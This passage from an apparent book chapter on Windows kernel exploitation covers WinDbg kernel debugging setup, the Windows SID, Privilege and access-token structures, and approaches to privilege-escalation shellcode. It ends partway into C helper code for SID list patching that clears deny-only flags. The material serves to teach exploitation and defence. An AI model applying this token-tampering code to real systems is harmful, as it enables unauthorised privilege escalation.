First, we need to create a virtual serial line connection in the guest OS. We can do this by creating a new serial port in the Virtual Machine settings and flagging the Connect at power on checkbox. We need to set Use named pipe as the connection type and specify a path such as \\.\pipe\com_1. We will also need to specify the options This end is the server and The other end is an application, as well as set the I/O Mode to Yield CPU on poll, as shown in Figure 6.2.

Image

Figure 6.2 Virtual machine setting.

The next steps for setting up the debugger concern the target kernel. We need to prepare the virtualized kernel to accept connections from the debugger. We can do this by simply adding a line to the C:\boot.ini configuration file, as shown in the following snippet:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="W2K3" /noexecute=optout /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="W2K3-Debug" /noexecute=optout /fastdetect /debugport=com1 /baudrate=115200

As we can see, a new W2K3-Debug entry has been added, specifying the /debugport and /baudrate options. Alternatively, on NT 6.x kernels, we can enable kernel debugging on the currently running kernel configuration using the following command:

bcdedit /debug on

In either scenario, we will need to reboot the guest Windows OS to make our changes take effect.

The final step in setting up the kernel debugger involves configuring WinDbg to automatically download symbols from the Microsoft symbol server, and connect to the local pipe. We can invoke WinDbg in the following manner:

windbg -b -k com:pipe,port=\\.\pipe\com_1,resets=0 -y srv*C:\W2K3\Symbols*http://msdl.microsoft.com/download/symbols

In the preceding example, the -b option tells the debugger to break into the target kernel as soon as the connection is established, while the -k option starts a kernel-mode debugging session and specifies the connection type; here, we instructed WinDbg to use a serial protocol over the local pipe, \\.\pipe\com_1. The -y option is used to specify the symbol file location, which starts with the substring srv*; it instructs WinDbg to connect to the remote symbol server (http://msdl.microsoft.com/download/symbols) and then store the results in the local C:\W2K3\Symbols directory. At this point, we are finished setting up WinDbg, and may now invoke it; if our setup was successful, we should see something similar to Figure 6.3.

Image

Figure 6.3 WinDbg.

There are essentially three main varieties of WinDbg commands: built-in commands, meta commands, and extensions. Built-in commands are native to the debugger and cover basic operations such as reading memory and placing breakpoints; other components can reuse them. Meta commands are prefixed with a dot (e.g., .srcpath) and cover most aspects of the debugger environment. Finally, extension commands are more complex and are implemented within a debugger extension (external DLLs). Usually they combine several built-in commands to execute a complex task such as listing processes (!process), displaying the page table entries for an address (!pte), inspecting the Page Frame Database (!pfn), and analyzing a crash dump (!analyze).

Regardless of which type of command we are dealing with, we can always access the proper Help documentation by executing the following meta command: .hh <command name>. When everything is set up properly we can start digging into kernel internals. Let's start.

The Execution Step

In this section, we will look at what we can do to escalate privileges after having taken control of a kernel control path flow. Although most examples and code in this section could be reused (if properly managed) within remote exploits, they are designed to work in a local privilege escalation scenario only. We will cover the subject of remote exploitation payloads extensively in Chapter 7.

Windows, unlike the UNIX OSes, has an intrinsically elaborate authentication and authorization model. A full analysis of this model—although quite interesting—would be rather impracticable and goes well beyond the scope of this book; therefore, here we will briefly discuss what you need to know regarding the authorization model to be able to build a working and reliable piece of shellcode payload. We also will cover the differences between the two targeted systems’ models—Windows Server 2003 (32-bit) and Windows Server 2008 (64-bit). For an excellent and in-depth discussion of the authentication and authorization model Windows uses, we refer you to Windows® Internals: Covering Windows Server® 2008 and Windows Vista®, Fifth Edition, by Mark E. Russinovich and David A. Solomon; this book is an invaluable reference for anybody interested in Windows system-level programming and vulnerability analysis.

Windows Authorization Model

Most Windows authorization is centered on three main concepts: the security descriptor, the security identifier (SID), and the access token. When dealing with Windows, we have to consider every system resource to be an object; files, directories, tokens, processes, threads, timers, mutexes, and so on are all objects. Even a process's shared memory segment (called a section) is treated as an object by the kernel. Every object has an associated security descriptor, a data structure specifying which principals can perform which actions on an object. The SID is used to identify entities that operate within the system. Every entity performing a login is associated with a list of SIDs and every process owned by the entity holds these SIDs within the process's access token. Every User, Local, and Domain group, every domain, and even every local computer has a SID value associated with it. When a process tries to access an object, the access check algorithm tries to determine if the given process can access the given resource by looking at the list of access control entries (ACEs) specified in the object's security descriptor, and comparing it with the list of SIDs present in the access token. An in-depth discussion of the access check algorithm, and the internal structure of the ACE and access control list (ACL), is beyond the scope of this book. The only thing we need to know here is that the SIDs are used in the access check algorithm to grant or deny access to a given object. If we can control the access token, and more specifically the list of SIDs within it, we can access every type of local resource.
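Although the full access check algorithm is out of scope, a heavily simplified sketch may help fix the idea that the SIDs in the token are matched against the ACEs in the security descriptor. The following C fragment is illustrative only: the sid_t, ace_t, and access_check() names are invented for this example, SIDs are reduced to plain integers, and deny-only SIDs, restricted SIDs, Privileges, and integrity levels are all ignored.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative types only: real SIDs and ACEs are variable-length structures. */
typedef uint32_t sid_t;                 /* a SID reduced to a single number */

typedef enum { ACE_ALLOW, ACE_DENY } ace_type_t;

typedef struct {
    ace_type_t type;
    sid_t      sid;                     /* principal the entry applies to */
    uint32_t   mask;                    /* access rights granted or denied */
} ace_t;

static bool token_has_sid(const sid_t *sids, size_t n, sid_t sid)
{
    for (size_t i = 0; i < n; i++)
        if (sids[i] == sid)
            return true;
    return false;
}

/* Walk the ACL in order. A matching deny entry that covers a right we still
 * need fails the check; matching allow entries clear rights until none remain. */
bool access_check(const sid_t *token_sids, size_t n_sids,
                  const ace_t *acl, size_t n_aces, uint32_t desired)
{
    uint32_t remaining = desired;

    for (size_t i = 0; i < n_aces && remaining != 0; i++) {
        if (!token_has_sid(token_sids, n_sids, acl[i].sid))
            continue;                   /* entry is for someone else */
        if (acl[i].type == ACE_DENY) {
            if (acl[i].mask & remaining)
                return false;
        } else {
            remaining &= ~acl[i].mask;
        }
    }
    return remaining == 0;
}
```

Even in this reduced form the consequence stated above is visible: whoever controls the list passed as token_sids controls the outcome of the check.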

Before we can finally begin to delve into the internals of the SID and access token structures, we need to introduce the last important authorization mechanism: Privileges. On Windows, a few actions are not related to any specific object but can interact with the system as a whole. These actions are performed only if a particular privilege is granted to the current process. For example, the ability to reboot or shut down the machine is governed by a specific privilege: SeShutdownPrivilege. Only processes in possession of this privilege are capable of shutting down the machine.

Every new version of Windows has introduced new privilege types; the most recent version of Windows at the time of this writing, Windows 7, has about 35 different privilege types. For the purposes of this discussion, we need to concern ourselves with only a few critical Privileges, called Super Privileges. Super Privileges are so powerful that a process in possession of just one of these types of Privileges is capable of completely compromising the system.

It is now time to delve into the details of SIDs, Privileges, and access token structures.

The Security Identifier (SID)

At first glance, we might be tempted to compare the Windows SID to the UNIX UID/GID; however, the SID is not related to user and group only. Not only is a SID associated with local Users and Groups, but a different SID is also assigned to Domain users, Domain groups, Computers, and so forth. Moreover, other special SIDs exist as well; examples include those that identify the authentication schema used by the logged-in user (NT AUTHORITY\NTLM Authentication) and the logon type (NT AUTHORITY\INTERACTIVE). In essence, we can say that a SID exists for every entity that can be used to grant or deny access to a principal.

The kernel uses the following data structure to represent the SID (Figure 6.4 shows an image of the SID):

Image

Figure 6.4 SID internal structure.

typedef struct _SID_IDENTIFIER_AUTHORITY
{
    UCHAR Value[6];
} SID_IDENTIFIER_AUTHORITY, *PSID_IDENTIFIER_AUTHORITY;

typedef struct _SID
{
    UCHAR Revision;
    UCHAR SubAuthorityCount;
    SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
    ULONG SubAuthority[1];
} SID, *PSID;

From the kernel's point of view, the SID is a variable-length structure composed of the following fields:

  • Revision

    The Revision field is a 1-byte-wide field holding the revision number, thereby telling the system how to manipulate the remainder of the structure. Currently, it holds the value 0x01. What follows it is relative to the SID structure identified by the current revision number (0x01).

  • SubAuthorityCount

    The SubAuthorityCount is a 1-byte-wide field holding the number of subauthorities; in theory a SID could have up to 255 subauthorities, but in practice the limit is 15.

  • IdentifierAuthority

    The IdentifierAuthority is a 48-bit field created by an array of six bytes that identifies the highest level of authority that can issue SIDs for this particular type of principal.

    There are many different possible authority values. A few of them are:

    • World Authority (1): used by the Everyone principal

    • NT Authority (5): used when the SID is issued by the Windows Security Authority

    • Mandatory Label Authority (16): used for the integrity level SID

  • SubAuthority

    The SubAuthority is a variable-length array of type ULONG containing the series of subauthority values. The first part (and the majority) of the series—that is, all of the subauthorities except for the final one—is considered part of the domain identifier, whereas the final element in the series is called the relative identifier (RID). The RID is 4 bytes wide, and is what distinguishes one account from another within the same domain (or within the local computer). Every account or group has a different RID within the same domain. Usually RIDs for normal User and Group accounts start at 1,000 and increase for each new User/Group; moreover, there are many built-in RIDs. Table 6.2 shows a few of them.

    Table 6.2 Well-known RIDs

    RID   SID                Subject
    544   S-1-5-32-544       BUILTIN Local Admin Group
    545   S-1-5-32-545       BUILTIN Local User Group
    500   S-1-5-domain-500   Administrator User
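To tie the fields above to the familiar S-1-5-32-544 notation, the following user-mode C sketch converts a SID-like structure to its string form and extracts the RID. The demo_sid_t type and both function names are invented for this example, and the fixed 15-entry array replaces the real variable-length layout for simplicity. One known simplification: Windows prints authority values that do not fit in 32 bits in hexadecimal, which this sketch does not attempt.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SID_MAX_SUB_AUTHORITIES 15

/* Fixed-size stand-in for the variable-length SID structure. */
typedef struct {
    uint8_t  Revision;
    uint8_t  SubAuthorityCount;
    uint8_t  IdentifierAuthority[6];    /* 48-bit value, most significant byte first */
    uint32_t SubAuthority[SID_MAX_SUB_AUTHORITIES];
} demo_sid_t;

/* Writes "S-<revision>-<authority>-<sub 1>-...-<RID>" into out.
 * Returns 0 on success, -1 on malformed input or if out is too small. */
int sid_to_string(const demo_sid_t *sid, char *out, size_t outlen)
{
    uint64_t authority = 0;
    size_t used;
    int n;

    if (sid->SubAuthorityCount > SID_MAX_SUB_AUTHORITIES)
        return -1;

    for (int i = 0; i < 6; i++)
        authority = (authority << 8) | sid->IdentifierAuthority[i];

    n = snprintf(out, outlen, "S-%u-%llu",
                 (unsigned)sid->Revision, (unsigned long long)authority);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    used = (size_t)n;

    for (unsigned i = 0; i < sid->SubAuthorityCount; i++) {
        n = snprintf(out + used, outlen - used, "-%lu",
                     (unsigned long)sid->SubAuthority[i]);
        if (n < 0 || (size_t)n >= outlen - used)
            return -1;
        used += (size_t)n;
    }
    return 0;
}

/* The RID is simply the last subauthority (0 if there are none). */
uint32_t sid_rid(const demo_sid_t *sid)
{
    return sid->SubAuthorityCount
         ? sid->SubAuthority[sid->SubAuthorityCount - 1]
         : 0;
}
```

Feeding it revision 1, authority {0,0,0,0,0,5}, and subauthorities {32, 544} yields the string for the built-in local administrators group from Table 6.2.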

Special SIDs

Along with User, Group, and Computer SIDs, there are a few special SIDs that are used to contextualize the user logon session, or to restrict user access to a set of resources. A few of them are important to know about in order to fully understand the troubles we may face when playing with the access token within our shellcode.

  • Restricted SID

    A SID can be flagged as restricted. A restricted SID is placed in a separate SID list called the restricted SID list. When the Access Check algorithm detects the presence of a SID on the restricted SID list within the access token, it performs a double-check; the first check is done using the default SID list, and the second one is done using the restricted SID list. To be able to access the resource, both checks must be passed successfully. Usually a restricted SID is used to temporarily drop the privileges of a running process.

  • Deny-Only SID

    SIDs in the access token can be flagged as deny-only SIDs. A deny-only SID will only be evaluated during an access check, when it gets compared against Access-Denied ACE structures. Since Access-Denied ACEs override Access-Grant ACEs, this type of SID can also be used to restrict access to resources. The use of deny-only SIDs is most prevalent when implementing the Filtered Admin Token.

  • Logon SID

    The Logon SID is created by the Winlogon process when a new session is created (i.e., after a successful login attempt), and is unique to the system. This SID is used to protect access to the desktop and to the Interactive Windows Station. When using Terminal Desktop, for example, every user gets a different session and a different desktop. Usually the system grants access to the current desktop to the Logon SID. In this way, every process owning this SID within its access token is able to successfully access it.

  • Integrity Level SID

    Beginning with the Vista release, Windows introduced the concept of Mandatory Integrity Levels. This mechanism is implemented using a particular type of SID, known as an integrity level SID. There are five types of integrity level SIDs, ranging from the lowest-possible privilege level, Untrusted Level (level 0), to the highest-possible privilege level, System Level (level 4), with a few levels in between. Following is a list of integrity level SIDs:

    S-1-16-0x0 Untrusted/Anonymous

    S-1-16-0x1000 Low

    S-1-16-0x2000 Medium

    S-1-16-0x3000 High

    S-1-16-0x4000 System

    Every object has an integrity level associated with its SID, and every process inherits the integrity level of its parent unless the SID of the executable child has an explicitly stated lower integrity level, in which case the new process will inherit the lower integrity level. When the default Mandatory Policy (No-Write-Up) is used, a process with a lower integrity level cannot write into a resource requiring a higher integrity level. When escalating privileges, we have to carefully check that the newly crafted (or stolen) token's access is not restricted due to a low integrity level.

    Tip

    To be able to perform all of the necessary steps of a successful exploitation, we need to make sure we properly check the integrity level of the process we will be using to deliver our payload. To further explain this mechanism, let's assume that we have already successfully managed to remotely exploit an instance of Internet Explorer running in Protected Mode, and that we wish to escalate privileges by way of a local kernel race condition. To successfully exploit this vulnerability, we will need to write a few bytes into a file to create a special file mapping. Where can we create this file? When Internet Explorer is running in Protected Mode, the process has a low integrity level (SID: S-1-16-4096), and the only writable directory we will have access to will be the %USERPROFILE%\AppData\LocalLow directory (or any other directory that grants write access to a low integrity level process).

  • Service SID

    With the release of Vista, Windows introduced the concept of the service SID. A service SID is a special SID that uses the existing Windows access control system to provide fine-grained access control on a service-by-service basis. With a service SID, you can apply an explicit ACL to a resource that the service will then be able to access exclusively. The service SID can also be used to restrict or prevent access to a service by making the service SID a deny-only SID. In doing this, we can prevent a service running as a user with a high privilege level from being able to access a given resource. We need to make sure we deal properly with the service SID when playing with the access token so as to avoid any unwanted limitations.
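The No-Write-Up rule described for integrity level SIDs above boils down to a comparison between two RIDs. The following C sketch shows that comparison under simplifying assumptions: the IL_* constants mirror the S-1-16-x values listed earlier, while the function names are invented for this example and the real policy has more options than this single check.

```c
#include <stdbool.h>
#include <stdint.h>

/* RIDs of the integrity level SIDs (S-1-16-<rid>) listed in this section. */
#define IL_UNTRUSTED 0x0000u
#define IL_LOW       0x1000u
#define IL_MEDIUM    0x2000u
#define IL_HIGH      0x3000u
#define IL_SYSTEM    0x4000u

/* Map an integrity RID to the name of the level it falls into. */
const char *integrity_level_name(uint32_t rid)
{
    if (rid >= IL_SYSTEM) return "System";
    if (rid >= IL_HIGH)   return "High";
    if (rid >= IL_MEDIUM) return "Medium";
    if (rid >= IL_LOW)    return "Low";
    return "Untrusted";
}

/* No-Write-Up: a subject may write only to objects whose integrity level
 * is not higher than its own. */
bool no_write_up_allows_write(uint32_t subject_rid, uint32_t object_rid)
{
    return subject_rid >= object_rid;
}
```

For the Protected Mode scenario in the Tip, the subject RID is 4096 (0x1000), so a write to any object labeled Medium or above is refused regardless of what the SID list in the token would otherwise allow.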

Privileges

As mentioned in the introduction, a few very powerful privilege levels exist. Since the word “privilege” can generally be used to describe a generic right, we decided to use the word Privilege (with a capital “P”) throughout this chapter whenever we are dealing with one of the access token privileges. To better understand the magnitude of such Privilege levels, we can take as an example two of the most known and abused Privileges: SeDebugPrivilege and SeLoadDriverPrivilege. A process with the SeDebugPrivilege Privilege level is able to attach to almost every process in the system. Being able to debug a process is equivalent to being able to modify its address space, thereby being able to gain total control of any privileged process. Similarly, the SeLoadDriverPrivilege, as the name suggests, grants every process owning it the ability to load an arbitrary device driver; again, being able to insert arbitrary code into the kernel means, in short, “game over.”

Warning

On x64 Windows kernels, Kernel Mode Code Signing (KMCS) is fully enforced, and therefore it is no longer possible to load unsigned drivers. This check is mainly used for code integrity purposes, but it is frequently—and incorrectly—also presented as a security feature. Despite the fact that KMCS does, indeed, prevent the insertion of unsigned code, there is nothing preventing an attacker from loading a signed yet known-vulnerable driver and exploiting it, thereby violating the kernel integrity.

Depending on the release level, Windows keeps track of the process's Privileges within the access token in different ways. In Windows versions up to Windows Server 2003 SP2, the currently active process's privileges are stored in a dynamically allocated LUID_AND_ATTRIBUTES structures array. The following snippet shows the structure:

typedef struct _LUID_AND_ATTRIBUTES {
    LUID Luid;
    DWORD Attributes;
} LUID_AND_ATTRIBUTES, *PLUID_AND_ATTRIBUTES;

This array is directly referenced by the access token, and holds only existing Privileges; these Privileges are owned by a process but can be either enabled or disabled. A Privilege can be enabled or disabled multiple times, but it can be dropped just one time. When a Privilege is dropped, the kernel definitively removes it from the array list; after the Privilege is removed, the process is no longer able to use the dropped Privilege. The kernel assigns a number, stored in the Luid field, to every Privilege. The Attributes field is used as a flag variable; the values of interest here are Disabled (0x0), Enabled (0x2, SE_PRIVILEGE_ENABLED), and Default Enabled (0x3, that is, SE_PRIVILEGE_ENABLED_BY_DEFAULT combined with SE_PRIVILEGE_ENABLED). The number of active Privileges stored in the array is also held by the access token (see the “Access Token” section of this chapter for details).
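The difference between disabling and dropping a Privilege in the array-based model can be sketched in a few lines of user-mode C. Everything prefixed with demo_ or priv_ is invented for this example; only the two flag values are taken from the SDK header winnt.h (SE_PRIVILEGE_ENABLED_BY_DEFAULT and SE_PRIVILEGE_ENABLED), and the real kernel bookkeeping is certainly more involved.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PRIV_ENABLED_BY_DEFAULT 0x1u    /* SE_PRIVILEGE_ENABLED_BY_DEFAULT */
#define PRIV_ENABLED            0x2u    /* SE_PRIVILEGE_ENABLED */

typedef struct { uint32_t LowPart; int32_t HighPart; } demo_luid_t;
typedef struct { demo_luid_t Luid; uint32_t Attributes; } demo_luid_and_attributes_t;

/* Stand-in for the array pointer and counter kept in the token. */
typedef struct {
    demo_luid_and_attributes_t *privs;
    uint32_t count;
} demo_priv_list_t;

static demo_luid_and_attributes_t *find_priv(demo_priv_list_t *l, uint32_t luid)
{
    for (uint32_t i = 0; i < l->count; i++)
        if (l->privs[i].Luid.LowPart == luid && l->privs[i].Luid.HighPart == 0)
            return &l->privs[i];
    return NULL;
}

/* Enabling or disabling only flips a flag; the entry stays in the array. */
int priv_set_enabled(demo_priv_list_t *l, uint32_t luid, int enable)
{
    demo_luid_and_attributes_t *p = find_priv(l, luid);
    if (!p)
        return -1;                      /* not owned: cannot be enabled */
    if (enable)
        p->Attributes |= PRIV_ENABLED;
    else
        p->Attributes &= ~PRIV_ENABLED;
    return 0;
}

/* Dropping removes the entry for good by closing the gap in the array. */
int priv_drop(demo_priv_list_t *l, uint32_t luid)
{
    demo_luid_and_attributes_t *p = find_priv(l, luid);
    if (!p)
        return -1;
    size_t tail = (size_t)(&l->privs[l->count] - (p + 1));
    memmove(p, p + 1, tail * sizeof *p);
    l->count--;
    return 0;
}
```

Once priv_drop() has run, a later priv_set_enabled() for the same number fails, which mirrors the one-way nature of dropping described above.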

From Windows Vista and later (i.e., NT 6.x kernels), the Privilege list is stored in bitmap form inside an SEP_TOKEN_PRIVILEGES structure, as shown in the following snippet:

typedef struct _SEP_TOKEN_PRIVILEGES
{
    UINT64 Present;
    UINT64 Enabled;
    UINT64 EnabledByDefault;
} SEP_TOKEN_PRIVILEGES, *PSEP_TOKEN_PRIVILEGES;

Each field (Present, Enabled, and EnabledByDefault), being of type UINT64, has the potential to hold up to 64 distinct Privileges, each identified by way of an index within the bitmap; the Present field holds the active Privileges bitmap, while the other fields (Enabled and EnabledByDefault) keep track of the status of the Privileges, much as the Attributes field does in older Windows implementations. Again, as with pre-Vista Windows implementations, the structure used to keep track of Privileges is referenced by the process's access token.
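The bitmap form makes Privilege manipulation a matter of setting bits. The following user-mode C sketch assumes that the bit index equals the Privilege number (the low part of its LUID); the three DEMO_SE_* numbers match the SE_*_PRIVILEGE values in the WDK headers, while the structure and function names are invented for this example.

```c
#include <stdbool.h>
#include <stdint.h>

/* Stand-in for SEP_TOKEN_PRIVILEGES. */
typedef struct {
    uint64_t Present;
    uint64_t Enabled;
    uint64_t EnabledByDefault;
} demo_token_privileges_t;

/* Privilege numbers as found in the WDK headers. */
#define DEMO_SE_LOAD_DRIVER_PRIVILEGE 10u
#define DEMO_SE_SHUTDOWN_PRIVILEGE    19u
#define DEMO_SE_DEBUG_PRIVILEGE       20u

/* Assumption: bit n of each bitmap corresponds to Privilege number n. */
static uint64_t priv_bit(unsigned luid)
{
    return luid < 64 ? (uint64_t)1 << luid : 0;
}

/* Mark a Privilege as both owned and enabled. */
void priv_grant_and_enable(demo_token_privileges_t *p, unsigned luid)
{
    p->Present |= priv_bit(luid);
    p->Enabled |= priv_bit(luid);
}

/* A Privilege is usable only if it is present and enabled. */
bool priv_is_enabled(const demo_token_privileges_t *p, unsigned luid)
{
    uint64_t bit = priv_bit(luid);
    return bit != 0 && (p->Present & bit) && (p->Enabled & bit);
}

/* Dropping clears the bit in all three bitmaps. */
void priv_remove(demo_token_privileges_t *p, unsigned luid)
{
    uint64_t bit = priv_bit(luid);
    p->Present          &= ~bit;
    p->Enabled          &= ~bit;
    p->EnabledByDefault &= ~bit;
}
```

Under that assumption, granting the debug Privilege to an empty structure leaves Present and Enabled both equal to 0x100000.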

Access Token

Every running thread and process has a corresponding security context—a set of information that describes the rights and privileges assigned to a security principal. The Windows kernel keeps track of the security context using a special object: the access token (or just token).

The access token is an opaque object that includes any information the kernel needs in order to grant or deny access to a resource, track process/thread resources, and manage the audit policy; it also contains various other process-, thread-, and system-related information. In short, by controlling the token, one controls the security principals behind it. Stealing a token from a given process implies associating all of the rights and Privileges of the stolen process with the attacker's process. Similarly, the ability to arbitrarily modify the current process's token permits the attacker to raise the local privileges to the maximum level.

The first step in getting to this point is to find the current token—or, more generally, to find the token associated with a given process. For simplicity's sake, let's look at how we can spot the token structure address with the help of the kernel debugger.

Our first step involves locating the EPROCESS address of the process we wish to monitor. Every process has an associated EPROCESS structure, an opaque structure that the kernel uses to keep track of all process attributes, such as the Object Table, the Process Locks state, the user-mode Process Environment Block (PEB) address, and, obviously, the access token.

In the following example, we use the WinDbg !process extension command to find the token address within the EPROCESS structure:

1: kd> !process 0 0

[…]

PROCESS fffffa8002395b30

SessionId: 1 Cid: 071c Peb: 7fffffdf000

ParentCid: 06a4

DirBase: 21cfd000

ObjectTable: fffff8a00104a8c0

HandleCount: 505.

Image: explorer.exe

[…]

1: kd> !process fffffa8002395b30 1

PROCESS fffffa8002395b30

SessionId: 1 Cid: 071c Peb: 7fffffdf000 ParentCid: 06a4

DirBase: 21cfd000 ObjectTable: fffff8a00104a8c0

HandleCount: 505.

Image: explorer.exe

VadRoot fffffa8002394ed0 Vads 281 Clone 0 Private 2417.

Modified 5. Locked 0.

DeviceMap fffff8a0009c74e0

Token fffff8a00106eac0

ElapsedTime 04:46:18.785

UserTime 00:00:00.234

KernelTime 00:00:00.640

[…]

The offset where the token pointer is stored within the EPROCESS structure varies among Windows releases. If we only need to modify the token, we can simply use the exported kernel API PsReferencePrimaryToken(); PsReferencePrimaryToken() returns a pointer to the token structure associated with the EPROCESS pointer that was passed to it as a parameter. If, however, we also need to know the exact offset of this pointer within the EPROCESS structure (e.g., during token stealing), we can simply walk over the EPROCESS structure and compare the address in the EPROCESS structure with the one returned by the PsReferencePrimaryToken() API.
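The walk over the EPROCESS structure can be sketched as a simple pointer-sized scan. One detail worth keeping in mind is that the token slot in EPROCESS is an EX_FAST_REF, whose low bits (3 on 32-bit kernels, 4 on 64-bit kernels) hold a cached reference count, so the comparison should ignore them. The following user-mode C fragment is a sketch under those assumptions; find_token_offset() and FAST_REF_MASK are names invented here, and in a real payload the buffer would be the EPROCESS itself and the token value would come from PsReferencePrimaryToken().

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Low bits of an EX_FAST_REF used as a reference count. */
#define FAST_REF_MASK(ptr_size) ((ptr_size) == 8 ? (uintptr_t)0xF : (uintptr_t)0x7)

/* Scan [eprocess, eprocess + limit) one pointer-sized slot at a time and
 * return the byte offset of the first slot that, with the reference-count
 * bits masked off, equals the token address. Returns -1 if none matches. */
ptrdiff_t find_token_offset(const void *eprocess, size_t limit, uintptr_t token)
{
    const unsigned char *base = eprocess;
    const uintptr_t mask = ~FAST_REF_MASK(sizeof(uintptr_t));

    for (size_t off = 0; off + sizeof(uintptr_t) <= limit; off += sizeof(uintptr_t)) {
        uintptr_t slot;
        memcpy(&slot, base + off, sizeof slot);   /* avoids aliasing issues */
        if ((slot & mask) == (token & mask))
            return (ptrdiff_t)off;
    }
    return -1;
}
```

The scan returns the first match, so a cautious payload would bound limit to a plausible structure size and treat a hit at an unexpected offset with suspicion.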

Now that we have discovered the token address by way of the EPROCESS structure, it is time to take a deeper look at the token structure itself. We can then use the token address together with the dt (display type) WinDbg command to print both the token structure and its content. What follows is the Windows Server 2008 R2 64-bit token structure:

1: kd> dt nt!_token fffff8a00106eac0

+0x000 TokenSource : _TOKEN_SOURCE

+0x010 TokenId : _LUID

+0x018 AuthenticationId : _LUID

+0x020 ParentTokenId : _LUID

+0x028 ExpirationTime : _LARGE_INTEGER 0x7fffffffffffffff

+0x030 TokenLock : 0xfffffa8002380940 _ERESOURCE

+0x038 ModifiedId : _LUID

+0x040 Privileges : _SEP_TOKEN_PRIVILEGES

+0x058 AuditPolicy : _SEP_AUDIT_POLICY

+0x074 SessionId : 1

+0x078 UserAndGroupCount : 0xc

+0x07c RestrictedSidCount : 0

+0x080 VariableLength : 0x238

+0x084 DynamicCharged : 0x400

+0x088 DynamicAvailable : 0

+0x08c DefaultOwnerIndex : 0

+0x090 UserAndGroups : 0xfffff8a00106edc8 _SID_AND_ATTRIBUTES

+0x098 RestrictedSids : (null)

+0x0a0 PrimaryGroup : 0xfffff8a0010066a0

+0x0a8 DynamicPart : 0xfffff8a0010066a0 -> 0x501

+0x0b0 DefaultDacl : 0xfffff8a0010066bc _ACL

+0x0b8 TokenType : 1 ( TokenPrimary )

+0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )

+0x0c0 TokenFlags : 0x2a00

+0x0c4 TokenInUse : 0x1 ''

+0x0c8 IntegrityLevelIndex : 0xb

+0x0cc MandatoryPolicy : 3

+0x0d0 LogonSession : 0xfffff8a000bcf230

+0x0d8 OriginatingLogonSession : _LUID

+0x0e0 SidHash : _SID_AND_ATTRIBUTES_HASH

+0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH

+0x300 pSecurityAttributes : 0xfffff8a000d36640

+0x308 VariablePart : 0xfffff8a00106ee88

As one might expect, the token holds the SID_AND_ATTRIBUTES array reference, which is stored in the UserAndGroups field at offset 0x90. The number of SID_AND_ATTRIBUTES entries in the UserAndGroups array is stored in the UserAndGroupCount variable at offset 0x78. Similar to the UserAndGroups/UserAndGroupCount fields, there are also corresponding fields to keep track of restricted SIDs, namely RestrictedSids and its counterpart, RestrictedSidCount. As no restricted SIDs are associated with this process, the RestrictedSids field holds a NULL pointer and the RestrictedSidCount is 0. The other important piece of information we are seeking from within the token structure is the previously mentioned Privileges list. Since the preceding snippet refers to an NT 6.x kernel, the Privileges are stored in the SEP_TOKEN_PRIVILEGES bitmap placed at offset 0x40.

Warning

Older NT 5.x kernel releases implement the Privileges list as a dynamic array of LUID_AND_ATTRIBUTES structures; this dynamic array is named Privileges, and is placed at offset 0x74. As opposed to SEP_TOKEN_PRIVILEGES, which is embedded within the access token itself, the Privileges field is just a pointer to the LUID_AND_ATTRIBUTES structures array.

Although we have found what we were originally searching for in this structure, the observant reader may have also noticed that there are a couple of additional unexpected entries: the SidHash and RestrictedSidHash fields. Both of these fields were introduced with the NT 6.x kernel, and they hold, respectively, the hashes of the UserAndGroups and RestrictedSids SID arrays. The access check algorithm checks these hashes every time the corresponding list of SIDs is used, in order to ensure that the SID list has not been modified. The main consequence of this is that when dealing with NT 6.x kernels, we can no longer directly modify the SID lists (or we cannot do so without updating the corresponding hashes, at least). There are three main ways around this obstacle:

  1. Apply the hash algorithm after modifying the SID lists.

  2. Avoid SID list patching and act only on the Privileges bitmap, continuing the exploitation in user land.

  3. Directly swap the offending token with a different token owned by a higher-privileged process (token stealing).

For brevity's sake, we will not cover the hashing implementation method in this book, but will instead concentrate our efforts on learning how to implement the remaining two workarounds.

Building the Shellcode

In this section, we will introduce three different pieces of shellcode (which have been written as C routines) that we can use within local kernel exploits to increase the privileges of the currently running process.

The first piece of shellcode, useful only on NT 5.x kernels, makes use of the SID list patching approach (the sample function was written to target a Windows Server 2003 SP2 32-bit system). The second piece of shellcode makes use of the Privileges patching approach, and can be triggered on all kernel releases (the sample function used in this chapter was written to exploit a Windows Server 2008 R2 64-bit system). The third and final sample piece of shellcode makes use of the token stealing approach. You can find the source code for all three of the aforementioned functions in the Trigger32.c and Trigger64.c files, as we discussed at the beginning of this chapter. In the coming sections, we will discuss the advantages and the drawbacks of each approach.

SID List Patching

The simplest way to begin our explanation of the SID list patching vector is by reviewing a code snippet. The routine that will be implementing this vector is called ShellcodeSIDListPatch(), the relevant code of which is as follows:

typedef struct _SID_BUILTIN
{
    UCHAR Revision;
    UCHAR SubAuthorityCount;
    SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
    ULONG SubAuthority[2];
} SID_BUILTIN, *PSID_BUILTIN;

/* S-1-5-32-544: BUILTIN\Administrators */
SID_BUILTIN SidLocalAdminGroup = {1, 2, {0,0,0,0,0,5}, {32,544}};

/* S-1-5-18: NT AUTHORITY\SYSTEM */
SID_BUILTIN SidSystem = {1, 1, {0,0,0,0,0,5}, {18,0}};

/* Return the first SID in the list whose RID (last subauthority) matches. */
PISID FindSID(PSID_AND_ATTRIBUTES firstSid,
              UINT32 count,
              ULONG rid)
{
    UINT32 i;
    ULONG lRid;
    PSID_AND_ATTRIBUTES pSidList = firstSid;

    for(i=0; i<count; i++, pSidList++)
    {
        PISID pSid = pSidList->Sid;
        lRid = pSid->SubAuthority[pSid->SubAuthorityCount-1];
        if(lRid == rid)
            return pSid;
    }
    return NULL;
}

/* Clear the deny-only flag on every SID in the list. */
VOID DisableDenyOnlySID(PSID_AND_ATTRIBUTES firstSid,
                        UINT32 count)
{
    UINT32 i;
    PSID_AND_ATTRIBUTES pSidList = firstSid;

    for(i=0; i<count; i++, pSidList++)
        pSidList->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
}
